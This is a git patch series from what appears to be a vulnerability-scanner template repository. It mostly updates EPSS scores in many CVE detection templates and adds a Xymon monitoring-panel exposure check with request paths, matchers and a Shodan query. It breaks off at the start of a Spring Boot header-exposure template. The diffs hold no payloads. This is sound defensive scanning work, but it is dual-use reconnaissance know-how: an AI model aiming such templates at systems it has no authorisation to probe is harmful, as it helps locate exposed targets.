a/http/cves/2025/CVE-2025-8848.yaml +++ b/http/cves/2025/CVE-2025-8848.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2025-8848 - epss-score: 0.00062 - epss-percentile: 0.19746 + epss-score: 0.00019 + epss-percentile: 0.04062 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-8868.yaml b/http/cves/2025/CVE-2025-8868.yaml index 7d85d38c502..77b74ab39b4 100644 --- a/http/cves/2025/CVE-2025-8868.yaml +++ b/http/cves/2025/CVE-2025-8868.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-8868 - epss-score: 0.18444 - epss-percentile: 0.95023 + epss-score: 0.14453 + epss-percentile: 0.94226 cwe-id: CWE-89 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-8943.yaml b/http/cves/2025/CVE-2025-8943.yaml index 8010924e02f..e1a1f383047 100644 --- a/http/cves/2025/CVE-2025-8943.yaml +++ b/http/cves/2025/CVE-2025-8943.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-8943 - epss-score: 0.67739 - epss-percentile: 0.98523 + epss-score: 0.80159 + epss-percentile: 0.99073 cwe-id: CWE-78 cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-9196.yaml b/http/cves/2025/CVE-2025-9196.yaml index 9ef1fc693f8..ea8a9e91461 100644 --- a/http/cves/2025/CVE-2025-9196.yaml +++ b/http/cves/2025/CVE-2025-9196.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-9196 cwe-id: CWE-200 epss-score: 0.01046 - epss-percentile: 0.77051 + epss-percentile: 0.77041 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-9744.yaml b/http/cves/2025/CVE-2025-9744.yaml index 6b258c1ff8c..8276b59df6b 100644 --- a/http/cves/2025/CVE-2025-9744.yaml +++ b/http/cves/2025/CVE-2025-9744.yaml @@ -19,7 +19,7 @@ info: cvss-score: 10 cve-id: CVE-2025-9744 epss-score: 0.01153 - epss-percentile: 0.78072 + epss-percentile: 0.78066 cwe-id: CWE-89 metadata: verified: true diff --git a/http/cves/2026/CVE-2026-21858.yaml b/http/cves/2026/CVE-2026-21858.yaml index 1477c22ba1e..601d5971abe 100644 --- a/http/cves/2026/CVE-2026-21858.yaml +++ b/http/cves/2026/CVE-2026-21858.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 10.0 cve-id: CVE-2026-21858 - epss-score: 0.0513 - epss-percentile: 0.89548 + epss-score: 0.03721 + epss-percentile: 0.87635 cwe-id: CWE-20 metadata: verified: true diff --git a/javascript/cves/2012/CVE-2012-2122.yaml b/javascript/cves/2012/CVE-2012-2122.yaml index abf22f72864..763e93375ba 100644 --- a/javascript/cves/2012/CVE-2012-2122.yaml +++ b/javascript/cves/2012/CVE-2012-2122.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-2122 cwe-id: CWE-287 epss-score: 0.94058 - epss-percentile: 0.99896 + epss-percentile: 0.99894 cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:* metadata: verified: true diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml index 0404f954cf9..61b67f6ad3a 100644 --- a/javascript/cves/2016/CVE-2016-8706.yaml +++ b/javascript/cves/2016/CVE-2016-8706.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.1 cve-id: CVE-2016-8706 cwe-id: CWE-190 - epss-score: 0.68629 - epss-percentile: 0.98561 + epss-score: 0.64223 + epss-percentile: 0.98379 cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/javascript/cves/2018/CVE-2018-8011.yaml b/javascript/cves/2018/CVE-2018-8011.yaml index 7610f447ca7..e8c74a7a557 100644 --- a/javascript/cves/2018/CVE-2018-8011.yaml +++ b/javascript/cves/2018/CVE-2018-8011.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-8011 cwe-id: CWE-119 - epss-score: 0.54627 - epss-percentile: 0.97948 + epss-score: 0.79907 + epss-percentile: 0.9906 cpe: cpe:2.3:a:apache:http_server:2.4.33:*:*:*:*:*:*:* metadata: verified: true diff --git a/javascript/cves/2019/CVE-2019-6443.yaml b/javascript/cves/2019/CVE-2019-6443.yaml index f76f008d447..92afcb15cad 100644 --- a/javascript/cves/2019/CVE-2019-6443.yaml +++ b/javascript/cves/2019/CVE-2019-6443.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-6443 cwe-id: CWE-125 epss-score: 0.30797 - epss-percentile: 0.96583 + epss-percentile: 0.96584 cpe: cpe:2.3:a:ntpsec:ntpsec:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml index 0bb9c064b31..a8521a19e81 100644 --- a/javascript/cves/2019/CVE-2019-9193.yaml +++ b/javascript/cves/2019/CVE-2019-9193.yaml @@ -17,7 +17,7 @@ info: max-request: 1 shodan-query: "product:\"PostgreSQL\"" classification: - epss-score: 0.93574 + epss-score: 0.93558 epss-percentile: 0.99821 tags: cve,cve2018,js,network,postgresql,intrusive,vkev,vuln diff --git a/javascript/cves/2021/CVE-2021-35394.yaml b/javascript/cves/2021/CVE-2021-35394.yaml index d06670eca89..64df4397e55 100644 --- a/javascript/cves/2021/CVE-2021-35394.yaml +++ b/javascript/cves/2021/CVE-2021-35394.yaml @@ -13,7 +13,7 @@ info: - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild classification: epss-score: 0.9422 - epss-percentile: 0.99919 + epss-percentile: 0.99918 tags: cve,cve2021,realtek,rce,kev,vkev,vuln javascript: diff --git a/javascript/cves/2021/CVE-2021-36754.yaml b/javascript/cves/2021/CVE-2021-36754.yaml index dedb9062749..2227e08df3d 100644 --- a/javascript/cves/2021/CVE-2021-36754.yaml +++ b/javascript/cves/2021/CVE-2021-36754.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-36754 cwe-id: CWE-119 - epss-score: 0.86445 - epss-percentile: 0.99387 + epss-score: 0.84525 + epss-percentile: 0.99296 cpe: cpe:2.3:a:powerdns:authoritative_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml index 195ae0b9609..38486ba7b17 100644 --- a/javascript/cves/2023/CVE-2023-34039.yaml +++ b/javascript/cves/2023/CVE-2023-34039.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2023-34039 cwe-id: CWE-327 epss-score: 0.92234 - epss-percentile: 0.99704 + epss-percentile: 0.99703 cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 15510427614..16a9be667ca 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2023-46604 cwe-id: CWE-502 epss-score: 0.94436 - epss-percentile: 0.99985 + epss-percentile: 0.99984 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/javascript/cves/2023/CVE-2023-48795.yaml b/javascript/cves/2023/CVE-2023-48795.yaml index 9387a09f3b2..8655ec79d2d 100644 --- a/javascript/cves/2023/CVE-2023-48795.yaml +++ b/javascript/cves/2023/CVE-2023-48795.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.9 cve-id: CVE-2023-48795 cwe-id: CWE-354 - epss-score: 0.57768 - epss-percentile: 0.98091 + epss-score: 0.57856 + epss-percentile: 0.98095 cpe: cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index 9348c808c98..d421c8f417f 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2001-1473 cwe-id: CWE-310 epss-score: 0.05858 - epss-percentile: 0.90278 + epss-percentile: 0.9028 cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/network/cves/2004/CVE-2004-0437.yaml b/network/cves/2004/CVE-2004-0437.yaml index 0b0f398c02e..c943c0b93f6 100644 --- a/network/cves/2004/CVE-2004-0437.yaml +++ b/network/cves/2004/CVE-2004-0437.yaml @@ -18,7 +18,7 @@ info: cvss-score: 5 cve-id: CVE-2004-0437 epss-score: 0.00626 - epss-percentile: 0.69638 + epss-percentile: 0.69625 cpe: cpe:2.3:a:south_river_technologies:titan_ftp_server:3.01_build_163:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/network/cves/2004/CVE-2004-0656.yaml b/network/cves/2004/CVE-2004-0656.yaml index 430634f9ed5..72716ba91f1 100644 --- a/network/cves/2004/CVE-2004-0656.yaml +++ b/network/cves/2004/CVE-2004-0656.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:N/A:P cvss-score: 5 cve-id: CVE-2004-0656 - epss-score: 0.00256 - epss-percentile: 0.48724 + epss-score: 0.00348 + epss-percentile: 0.5679 cpe: cpe:2.3:a:pureftpd:pureftpd:0.96:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2004/CVE-2004-1602.yaml b/network/cves/2004/CVE-2004-1602.yaml index de3c07ed0ce..4c0fa93e739 100644 --- a/network/cves/2004/CVE-2004-1602.yaml +++ b/network/cves/2004/CVE-2004-1602.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2004-1602 cwe-id: CWE-203 epss-score: 0.0083 - epss-percentile: 0.74051 + epss-percentile: 0.74026 cpe: cpe:2.3:a:proftpd:proftpd:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2004/CVE-2004-1641.yaml b/network/cves/2004/CVE-2004-1641.yaml index 65e20086e74..fd4e2800b45 100644 --- a/network/cves/2004/CVE-2004-1641.yaml +++ b/network/cves/2004/CVE-2004-1641.yaml @@ -18,7 +18,7 @@ info: cvss-score: 5 cve-id: CVE-2004-1641 epss-score: 0.00881 - epss-percentile: 0.74901 + epss-percentile: 0.74883 cpe: cpe:2.3:a:south_river_technologies:titan_ftp_server:2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/network/cves/2004/CVE-2004-2687.yaml b/network/cves/2004/CVE-2004-2687.yaml index 4595f94dea4..10d43e60aa9 100644 --- a/network/cves/2004/CVE-2004-2687.yaml +++ b/network/cves/2004/CVE-2004-2687.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.3 cve-id: CVE-2004-2687 cwe-id: CWE-16 - epss-score: 0.90252 - epss-percentile: 0.99577 + epss-score: 0.8951 + epss-percentile: 0.99534 cpe: cpe:2.3:a:apple:xcode:1.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2005/CVE-2005-0850.yaml b/network/cves/2005/CVE-2005-0850.yaml index 61f536223a1..b5a5e50b9cb 100644 --- a/network/cves/2005/CVE-2005-0850.yaml +++ b/network/cves/2005/CVE-2005-0850.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2005-0850 cwe-id: CWE-20 epss-score: 0.00094 - epss-percentile: 0.27008 + epss-percentile: 0.26958 cpe: cpe:2.3:a:filezilla-project:filezilla_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2005/CVE-2005-0851.yaml b/network/cves/2005/CVE-2005-0851.yaml index 64fdbd3cd9a..9767e449893 100644 --- a/network/cves/2005/CVE-2005-0851.yaml +++ b/network/cves/2005/CVE-2005-0851.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2005-0851 cwe-id: CWE-835 epss-score: 0.00069 - epss-percentile: 0.21622 + epss-percentile: 0.21565 cpe: cpe:2.3:a:filezilla-project:filezilla_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2006/CVE-2006-2173.yaml b/network/cves/2006/CVE-2006-2173.yaml index 3b2d32e9354..33c19a8587a 100644 --- a/network/cves/2006/CVE-2006-2173.yaml +++ b/network/cves/2006/CVE-2006-2173.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.4 cve-id: CVE-2006-2173 epss-score: 0.00726 - epss-percentile: 0.72098 + epss-percentile: 0.72073 cpe: cpe:2.3:a:filezilla:filezilla_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2006/CVE-2006-6565.yaml b/network/cves/2006/CVE-2006-6565.yaml index 59b3700cb95..c260b08e8e4 100644 --- a/network/cves/2006/CVE-2006-6565.yaml +++ b/network/cves/2006/CVE-2006-6565.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2006-6565 cwe-id: CWE-476 epss-score: 0.66974 - epss-percentile: 0.98494 + epss-percentile: 0.98496 cpe: cpe:2.3:a:filezilla-project:filezilla_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2008/CVE-2008-5281.yaml b/network/cves/2008/CVE-2008-5281.yaml index 90c1b81ea97..69accd8aab8 100644 --- a/network/cves/2008/CVE-2008-5281.yaml +++ b/network/cves/2008/CVE-2008-5281.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2008-5281 cwe-id: CWE-119 epss-score: 0.0192 - epss-percentile: 0.82907 + epss-percentile: 0.82903 cpe: cpe:2.3:a:south_river_technologies:titan_ftp_server:6.05:build_550:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2009/CVE-2009-0884.yaml b/network/cves/2009/CVE-2009-0884.yaml index 735ccada37f..67b5959b487 100644 --- a/network/cves/2009/CVE-2009-0884.yaml +++ b/network/cves/2009/CVE-2009-0884.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-0884 cwe-id: CWE-120 epss-score: 0.00332 - epss-percentile: 0.55525 + epss-percentile: 0.55518 cpe: cpe:2.3:a:filezilla-project:filezilla_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2010/CVE-2010-3867.yaml b/network/cves/2010/CVE-2010-3867.yaml index b1cb08759ee..d96e5c1cab6 100644 --- a/network/cves/2010/CVE-2010-3867.yaml +++ b/network/cves/2010/CVE-2010-3867.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2010-3867 cwe-id: CWE-22 epss-score: 0.00187 - epss-percentile: 0.40687 + epss-percentile: 0.40645 cpe: cpe:2.3:a:proftpd:proftpd:1.2.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2011/CVE-2011-0762.yaml b/network/cves/2011/CVE-2011-0762.yaml index 7c1166729d7..57e9ad980ae 100644 --- a/network/cves/2011/CVE-2011-0762.yaml +++ b/network/cves/2011/CVE-2011-0762.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2011-0762 cwe-id: CWE-400 epss-score: 0.45278 - epss-percentile: 0.97494 + epss-percentile: 0.97489 cpe: cpe:2.3:a:vsftpd_project:vsftpd:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2011/CVE-2011-3171.yaml b/network/cves/2011/CVE-2011-3171.yaml index 0df67c4ac1a..490ea0d5d87 100644 --- a/network/cves/2011/CVE-2011-3171.yaml +++ b/network/cves/2011/CVE-2011-3171.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-3171 cwe-id: CWE-22 epss-score: 0.00019 - epss-percentile: 0.04202 + epss-percentile: 0.04186 cpe: cpe:2.3:a:pureftpd:pure-ftpd:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2014/CVE-2014-1842.yaml b/network/cves/2014/CVE-2014-1842.yaml index b5e40e032db..9e2983ca754 100644 --- a/network/cves/2014/CVE-2014-1842.yaml +++ b/network/cves/2014/CVE-2014-1842.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-1842 cwe-id: CWE-22 epss-score: 0.04433 - epss-percentile: 0.887 + epss-percentile: 0.88699 cpe: cpe:2.3:a:southrivertech:titan_ftp_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2014/CVE-2014-1843.yaml b/network/cves/2014/CVE-2014-1843.yaml index 3ca5cd44494..ee264994b1a 100644 --- a/network/cves/2014/CVE-2014-1843.yaml +++ b/network/cves/2014/CVE-2014-1843.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-1843 cwe-id: CWE-22 epss-score: 0.04824 - epss-percentile: 0.89197 + epss-percentile: 0.89195 cpe: cpe:2.3:a:southrivertech:titan_ftp_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index 1317ee2842c..b5e72486b9a 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-2004 cwe-id: CWE-306 epss-score: 0.92734 - epss-percentile: 0.99741 + epss-percentile: 0.9974 cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 5cd8283c005..f24706857fd 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-3510 cwe-id: CWE-119 epss-score: 0.94011 - epss-percentile: 0.99887 + epss-percentile: 0.99886 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index 378350fa6a8..99a03646bd5 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-5645 cwe-id: CWE-502 epss-score: 0.94013 - epss-percentile: 0.99889 + epss-percentile: 0.99887 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/network/cves/2019/CVE-2019-20176.yaml b/network/cves/2019/CVE-2019-20176.yaml index 55e4e9d72d5..bebd01589b3 100644 --- a/network/cves/2019/CVE-2019-20176.yaml +++ b/network/cves/2019/CVE-2019-20176.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-20176 cwe-id: CWE-400 epss-score: 0.22328 - epss-percentile: 0.95632 + epss-percentile: 0.95636 cpe: cpe:2.3:a:pureftpd:pure-ftpd:1.0.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2020/CVE-2020-0796.yaml b/network/cves/2020/CVE-2020-0796.yaml index b588d13b277..ddfeafc26ac 100644 --- a/network/cves/2020/CVE-2020-0796.yaml +++ b/network/cves/2020/CVE-2020-0796.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-0796 cwe-id: CWE-119 epss-score: 0.94408 - epss-percentile: 0.99975 + epss-percentile: 0.99974 cpe: cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:arm64:* metadata: vendor: microsoft diff --git a/network/cves/2020/CVE-2020-14644.yaml b/network/cves/2020/CVE-2020-14644.yaml index 9205c9ecd55..6723e0159ff 100644 --- a/network/cves/2020/CVE-2020-14644.yaml +++ b/network/cves/2020/CVE-2020-14644.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-14644 cwe-id: CWE-502 epss-score: 0.9364 - epss-percentile: 0.99829 + epss-percentile: 0.99831 cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* metadata: vendor: oracle diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 4468564936e..75d95a8c575 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-1938 cwe-id: CWE-269 epss-score: 0.94469 - epss-percentile: 0.99997 + epss-percentile: 0.99996 cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/network/cves/2020/CVE-2020-35359.yaml b/network/cves/2020/CVE-2020-35359.yaml index e377185832c..f15ecf8623e 100644 --- a/network/cves/2020/CVE-2020-35359.yaml +++ b/network/cves/2020/CVE-2020-35359.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-35359 cwe-id: CWE-770 epss-score: 0.08638 - epss-percentile: 0.92183 + epss-percentile: 0.92177 cpe: cpe:2.3:a:pureftpd:pure-ftpd:1.0.48:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/network/cves/2020/CVE-2020-9274.yaml b/network/cves/2020/CVE-2020-9274.yaml index 69da832c090..507a870e615 100644 --- a/network/cves/2020/CVE-2020-9274.yaml +++ b/network/cves/2020/CVE-2020-9274.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-9274 cwe-id: CWE-824 epss-score: 0.15323 - epss-percentile: 0.94419 + epss-percentile: 0.94416 cpe: cpe:2.3:a:pureftpd:pure-ftpd:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2021/CVE-2021-27877.yaml b/network/cves/2021/CVE-2021-27877.yaml index b24dd3a2ccf..ef8a01b0856 100644 --- a/network/cves/2021/CVE-2021-27877.yaml +++ b/network/cves/2021/CVE-2021-27877.yaml @@ -17,7 +17,7 @@ info: cvss-score: 8.2 cve-id: CVE-2021-27877 epss-score: 0.29375 - epss-percentile: 0.96453 + epss-percentile: 0.96457 cpe: cpe:2.3:a:veritas:backup_exec:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2021/CVE-2021-30047.yaml b/network/cves/2021/CVE-2021-30047.yaml index bebc3c63385..7b32185a0be 100644 --- a/network/cves/2021/CVE-2021-30047.yaml +++ b/network/cves/2021/CVE-2021-30047.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-30047 epss-score: 0.3126 - epss-percentile: 0.96616 + epss-percentile: 0.9662 cpe: cpe:2.3:a:vsftpd_project:vsftpd:3.0.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2021/CVE-2021-40524.yaml b/network/cves/2021/CVE-2021-40524.yaml index e9cd022246f..5fa4c531a3b 100644 --- a/network/cves/2021/CVE-2021-40524.yaml +++ b/network/cves/2021/CVE-2021-40524.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-40524 cwe-id: CWE-434 epss-score: 0.24037 - epss-percentile: 0.95861 + epss-percentile: 0.95865 cpe: cpe:2.3:a:pureftpd:pure-ftpd:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 8faf6a48a64..2cacc0ca695 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-24706 cwe-id: CWE-1188 epss-score: 0.94392 - epss-percentile: 0.9997 + epss-percentile: 0.99969 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/network/cves/2023/CVE-2023-37582.yaml b/network/cves/2023/CVE-2023-37582.yaml index b326d110503..cad94d3d8d4 100644 --- a/network/cves/2023/CVE-2023-37582.yaml +++ b/network/cves/2023/CVE-2023-37582.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-37582 cwe-id: CWE-94 epss-score: 0.93986 - epss-percentile: 0.99882 + epss-percentile: 0.99881 cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2023/CVE-2023-48788.yaml b/network/cves/2023/CVE-2023-48788.yaml index c847c03cbd6..fcd1f8732d6 100644 --- a/network/cves/2023/CVE-2023-48788.yaml +++ b/network/cves/2023/CVE-2023-48788.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-48788 cwe-id: CWE-89 - epss-score: 0.9416 - epss-percentile: 0.99909 + epss-score: 0.94128 + epss-percentile: 0.99906 cpe: cpe:2.3:a:fortinet:forticlient_enterprise_management_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2024/CVE-2024-23108.yaml b/network/cves/2024/CVE-2024-23108.yaml index 6350fac2e7a..44caa23ce24 100644 --- a/network/cves/2024/CVE-2024-23108.yaml +++ b/network/cves/2024/CVE-2024-23108.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2024-23108 cwe-id: CWE-78 - epss-score: 0.90389 - epss-percentile: 0.99585 + epss-score: 0.91253 + epss-percentile: 0.99631 cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/network/cves/2024/CVE-2024-48651.yaml b/network/cves/2024/CVE-2024-48651.yaml index 5e1944c71a7..9680a86eb36 100644 --- a/network/cves/2024/CVE-2024-48651.yaml +++ b/network/cves/2024/CVE-2024-48651.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-48651 cwe-id: CWE-863 epss-score: 0.27097 - epss-percentile: 0.96223 + epss-percentile: 0.96225 metadata: verified: true max-request: 1 diff --git a/network/cves/2025/CVE-2025-25256.yaml b/network/cves/2025/CVE-2025-25256.yaml index b498e2afa11..5479221f71e 100644 --- a/network/cves/2025/CVE-2025-25256.yaml +++ b/network/cves/2025/CVE-2025-25256.yaml @@ -15,8 +15,8 @@ info: cwe-id: CWE-78 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" cvss-score: 9.8 - epss-percentile: 0.96147 - epss-score: 0.26274 + epss-percentile: 0.95568 + epss-score: 0.21753 cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* metadata: vendor: fortinet diff --git a/network/cves/2025/CVE-2025-47188.yaml b/network/cves/2025/CVE-2025-47188.yaml index b9fd5731a78..06bb0fce86e 100644 --- a/network/cves/2025/CVE-2025-47188.yaml +++ b/network/cves/2025/CVE-2025-47188.yaml @@ -13,8 +13,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-47188 - epss-score: 0.03831 - epss-percentile: 0.87817 + epss-score: 0.02857 + epss-percentile: 0.85849 cpe: cpe:2.3:a:mitel:6000:*:*:*:*:*:*:* metadata: vendor: mitel diff --git a/network/cves/2025/CVE-2025-8286.yaml b/network/cves/2025/CVE-2025-8286.yaml index 199bcd77123..0dc08c8e01d 100644 --- a/network/cves/2025/CVE-2025-8286.yaml +++ b/network/cves/2025/CVE-2025-8286.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-306 cve-id: CVE-2025-8286 epss-score: 0.00583 - epss-percentile: 0.68374 + epss-percentile: 0.68362 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" cvss-score: 9.8 metadata: From 84c99320d52e6a2d2156f7b9088976176c8d793f Mon Sep 17 00:00:00 2001 From: Aman Rawat <35992750+theamanrawat@users.noreply.github.com> Date: Mon, 19 Jan 2026 10:16:49 +0530 Subject: [PATCH 11/92] Create xymon-exposure.yaml --- http/exposed-panels/xymon-exposure.yaml | 39 +++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/exposed-panels/xymon-exposure.yaml diff --git a/http/exposed-panels/xymon-exposure.yaml b/http/exposed-panels/xymon-exposure.yaml new file mode 100644 index 00000000000..66189e4d0df --- /dev/null +++ b/http/exposed-panels/xymon-exposure.yaml @@ -0,0 +1,39 @@ +id: xymon-exposure + +info: + name: Xymon - Exposure + author: theamanrawat + severity: low + description: | + Detected the exposure of the Xymon monitoring system interface. + reference: + - https://xymon.com/ + metadata: + shodan-query: http.title:"Xymon" + tags: xymon,exposure,monitoring,panel + +http: + - method: GET + path: + - "{{BaseURL}}/xymon/" + - "{{BaseURL}}/xymon-se/xymon/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Xymon" + - "xymon-se" + - "xymon-cgi" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From bf2dacdc9c10f1c2f24487554114a0e902742412 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 19 Jan 2026 11:24:23 +0530 Subject: [PATCH 12/92] Spring Boot `X-Application-Context` Header Exposure --- .../springboot-x-application-context.yaml | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/misconfiguration/springboot/springboot-x-application-context.yaml diff --git a/http/misconfiguration/springboot/springboot-x-application-context.yaml b/http/misconfiguration/springboot/springboot-x-application-context.yaml new file mode 100644 index 00000000000..0245f2a7f69 --- /dev/null +++ b/http/misconfiguration/springboot/springboot-x-application-context.yaml @@ -0,0 +1,41 @@ +id: 